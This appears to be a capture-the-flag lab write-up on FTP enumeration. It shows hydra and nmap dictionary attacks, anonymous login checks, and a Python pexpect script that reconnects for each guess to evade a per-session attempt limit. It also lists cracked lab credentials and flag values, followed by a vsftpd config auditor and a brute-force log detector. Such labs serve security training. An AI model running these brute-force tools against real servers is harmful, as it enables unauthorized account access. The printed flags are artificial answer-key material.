ftp-enum

Lab collection showing FTP enumeration and credential discovery techniques.



Lab 1 — FTP Brute Force and Extract Flags

Target IPs and context are shown in the commands below.

  • Use hydra with user/password wordlists to check for valid credentials on the FTP server.

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.217.238.3 -t 4 ftp

Example hydra output:

[DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task
[DATA] attacking ftp://192.217.238.3:21/
[21][ftp] host: 192.217.238.3   login: sysadmin   password: 654321
[21][ftp] host: 192.217.238.3   login: rooty   password: qwerty
[21][ftp] host: 192.217.238.3   login: demo   password: butterfly
[21][ftp] host: 192.217.238.3   login: auditor   password: chocolate
[21][ftp] host: 192.217.238.3   login: anon   password: purple
[21][ftp] host: 192.217.238.3   login: administrator   password: tweety
[21][ftp] host: 192.217.238.3   login: diag   password: tigger
1 of 1 target successfully completed, 7 valid passwords found

Found credentials:

  • sysadmin:654321

  • rooty:qwerty

  • demo:butterfly

  • auditor:chocolate

  • anon:purple

  • administrator:tweety

  • diag:tigger

  • Use nmap ftp-brute script to confirm sysadmin's password:

echo "sysadmin" > users

nmap --script ftp-brute --script-args userdb=/root/users -p21 192.217.238.3

Example nmap output:

21/tcp open  ftp
| ftp-brute:
|   Accounts:
|     sysadmin:654321 - Valid credentials
|_  Statistics: Performed 23 guesses in 6 seconds, average tps: 3.8

  • Extract the flags by logging into the FTP server with each found user and downloading the flag files:

Example FTP session:

ftp 192.217.238.3

ftp> ls
ftp> get secret.txt
ftp> exit

root@attackdefense:~# cat secret.txt

Reveal flags (from the server, per account):

  • sysadmin flag: 260ca9dd8a4577fc00b7bd5810298076

  • rooty flag: e529a9cea4a728eb9c5828b13b22844c

  • demo flag: d6a6bc0db10694a2d90e3a69648f3a03

  • auditor flag: 098f6bcd4621d373cade4e832627b4f6

  • anon flag: 1bc29b36f623ba82aaf6724fd3b16718

  • administrator flag: 21232f297a57a5a743894a0e4a801fc3

  • diag flag: 12a032ce9179c32a6c7ab397b9d871fa


Lab 2 — VSFTPD Recon: Basics

  • Challenge reference: VSFTPD Recon: Basics (AttackDefense)

  • Target IP: 192.119.169.3

Network info (example):

ip -br -c a
	eth1@if170803   UP  192.119.169.2/24

Initial discovery:

nmap 192.119.169.3
# 21/tcp open  ftp

Service/version detection:

nmap -p21 -sV -O 192.119.169.3

Example output:

21/tcp open  ftp     vsftpd 3.0.3

  • FTP server version: vsftpd 3.0.3

  • Check for anonymous login using nmap ftp-anon script:

nmap --script ftp-anon -p21 192.119.169.3

Example output:

21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Dec 18  2018 flag
|_drwxr-xr-x    2 ftp      ftp          4096 Dec 18  2018 pub

  • Anonymous FTP login is allowed. Connect with the anonymous account and download the flag:

ftp 192.119.169.3

# Use anonymous:anonymous to login

Name (192.119.169.3:root): anonymous
    331 Please specify the password.
Password:
    230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
ftp> get flag
ftp> exit

root@attackdefense:~# cat flag

Reveal flag: 4267bdfbff77d7c2635e4572519a8b9c
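
The defender's check for what Lab 2 found, as an added example that is not part of the original lab: a small audit of a vsftpd.conf for anonymous access and login throttling. The defaults are vsftpd's built-in values from its man page; the sample configs and the 3-second delay threshold are assumptions made for illustration.

```python
# Added example: audit vsftpd.conf text for the settings these labs depend on.
# A key missing from the file takes vsftpd's built-in default, so the parser
# starts from DEFAULTS instead of treating "absent" as "off".
DEFAULTS = {
    "anonymous_enable": "YES",  # anonymous login is on unless disabled
    "max_login_fails": "3",     # failed logins before the session is killed
    "delay_failed_login": "1",  # seconds paused after a failed login
    "max_per_ip": "0",          # 0 = unlimited connections per client IP
}

def parse_conf(text):
    """Return effective settings: defaults overridden by key=value lines."""
    conf = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf

def audit(text, min_delay=3):
    """Return a list of findings; min_delay is an assumed local policy."""
    conf = parse_conf(text)
    findings = []
    if conf["anonymous_enable"].upper() == "YES":
        findings.append("anonymous_enable=YES: anonymous login allowed")
    if int(conf["max_per_ip"]) == 0:
        findings.append("max_per_ip=0: no cap on connections per client IP")
    if int(conf["delay_failed_login"]) < min_delay:
        findings.append("delay_failed_login below policy: guesses retry fast")
    return findings

# Constructed sample configs (not taken from the lab targets).
WEAK = "listen=YES\nlocal_enable=YES\n# anonymous_enable not set\n"
HARDENED = "listen=YES\nanonymous_enable=NO\nmax_per_ip=2\ndelay_failed_login=5\n"

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit(text))
```

The weak sample never mentions anonymous_enable and is still flagged, because the built-in default is YES.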


Lab 3 — VSFTPD Recon: Dictionary Attack

  • Challenge reference: VSFTPD Recon: Dictionary Attack (AttackDefense)

  • Target IP: 192.14.30.3

  • Note: FTP server terminates the session after 3 attempts, so a custom approach may be required.

Network info (example):

ip -br -c a
	eth1@if170888   UP   192.14.30.2/24

Discovery:

nmap 192.14.30.3
# 21/tcp open  ftp

Service/version detection:

nmap -p21 -sV -O 192.14.30.3
# 21/tcp open  ftp     vsftpd 3.0.3

  • Example using nmap ftp-brute with a single user (billy):

echo "billy" > users

nmap --script ftp-brute --script-args userdb=/root/users -p21 192.14.30.3

Example output:

21/tcp open  ftp
| ftp-brute:
|   Accounts:
|     billy:carlos - Valid credentials
|_  Statistics: Performed 78 guesses in 55 seconds, average tps: 1.5

  • Discovered credential: billy:carlos

  • If the server terminates sessions after 3 attempts, use a custom script that spawns a fresh FTP connection per attempt. Example Python script using pexpect (save as billy.py):

import pexpect
import sys

# Usage: python billy.py <target-ip> <username> <password-wordlist>
target = sys.argv[1]
username = sys.argv[2]
password_dict = sys.argv[3]

# Load the password dictionary and strip trailing newlines
with open(password_dict) as f:
    lines = [line.rstrip('\n') for line in f]

# Iterate over the dictionary, spawning a fresh ftp client per attempt
for password in lines:
    child = pexpect.spawn('ftp ' + target, encoding='utf-8')
    child.expect('Name .*: ')
    child.sendline(username)
    print("Trying with password:  " + password)
    child.expect('Password:')
    child.sendline(password)
    i = child.expect(['Login successful', 'Login failed'])
    if i == 1:
        # Login failed: close this session before the next attempt
        child.close(force=True)
    elif i == 0:
        print("Login Successful for  " + password)
        print(child.before)
        child.close(force=True)
        break

Run the script:

python billy.py 192.14.30.3 billy /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Example output:

Login Successful for  carlos

  • Use the credential to fetch the flag via FTP:

ftp 192.14.30.3

ftp> ls
ftp> get flag
ftp> exit

root@attackdefense:~# cat flag

Reveal flag: c07c7a9be16f43bb473ed7b604295c0b
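
The server-side view of Lab 1 and Lab 3, as an added example that is not part of the original labs: because the per-session limit of 3 attempts is sidestepped by reconnecting, detection has to count failed logins per client IP across sessions. The log line shape is vsftpd's own log format as assumed here; the sample lines, the user alice, and the threshold and window values are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed vsftpd.log line shape (vsftpd's own format, not xferlog).
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag client IPs with `threshold` failed logins inside `window`.

    Failures are keyed by client IP, not by pid/session, so one attempt
    per connection still accumulates. A later OK LOGIN from a flagged IP
    marks that account as likely guessed.
    """
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    tried = defaultdict(set)      # ip -> usernames that failed from it
    alerts = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        if m["result"] == "FAIL":
            tried[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                alerts.setdefault(ip, {"users": tried[ip], "compromised": set()})
        elif ip in alerts:
            alerts[ip]["compromised"].add(user)
    return alerts

# Constructed sample: six failures, each from a new session (new pid), then a hit.
SAMPLE = [f'Tue Dec 18 10:00:{2*i:02d} 2018 [pid {100+i}] [billy] FAIL LOGIN: '
          f'Client "192.14.30.2"' for i in range(6)]
SAMPLE += ['Tue Dec 18 10:00:12 2018 [pid 106] [billy] OK LOGIN: Client "192.14.30.2"',
           'Tue Dec 18 10:01:00 2018 [pid 200] [alice] FAIL LOGIN: Client "192.14.30.9"',
           'Tue Dec 18 10:01:05 2018 [pid 200] [alice] OK LOGIN: Client "192.14.30.9"']

if __name__ == "__main__":
    print(detect(SAMPLE))
```

A single mistyped password followed by a successful login (the alice lines) stays below the threshold and raises nothing.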

